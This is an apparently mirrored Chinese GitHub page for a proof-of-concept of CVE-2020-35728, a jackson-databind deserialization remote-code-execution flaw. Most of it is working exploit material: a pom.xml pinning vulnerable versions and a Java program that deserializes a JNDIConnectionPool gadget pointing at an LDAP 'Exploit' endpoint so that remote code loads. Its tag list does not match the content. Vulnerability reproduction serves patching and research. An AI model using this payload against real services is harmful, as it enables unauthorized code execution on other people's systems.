Al1ex/CVE-2020-35728

GitHub: Al1ex/CVE-2020-35728

该项目是 CVE-2020-35728(jackson-databind 反序列化 RCE)的漏洞复现 PoC,通过构造 JNDIConnectionPool 序列化载荷演示远程代码执行过程。

Stars: 42 | Forks: 7

### 描述 FasterXML jackson-databind 2.x 2.9.10.8 之前版本错误处理了序列化 gadget 与 typing 之间的交互,该问题与 `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool`(即 `org.glassfish.web/javax.servlet.jsp.jstl` 中内嵌的 Xalan)有关。 ### 如何进行 RCE pom.xml ``` 4.0.0 com.jacksonTest jacksonTest 1.0-SNAPSHOT com.fasterxml.jackson.core jackson-databind 2.9.10.7 org.glassfish.web jakarta.servlet.jsp.jstl 2.0.0 org.slf4j slf4j-nop 1.7.2 javax.transaction jta 1.1 ``` poc.java ``` import com.fasterxml.jackson.databind.ObjectMapper; public class POC { public static void main(String[] args) throws Exception { String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1088/Exploit\"}]"; ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); Object obj = mapper.readValue(payload, Object.class); mapper.writeValueAsString(obj); } } ``` 结果 ![结果](https://static.pigsec.cn/wp-content/uploads/repos/cas/87/87c042f2c6ce1041308e98a44197ec03f24cdcb1adf8087d314ff70d9cbaa434.jpg)
标签:Checkov, CVE-2020-35728, Go语言工具, Jackson, JS文件枚举, PoC, RCE, 反序列化, 开放策略代理, 暴力破解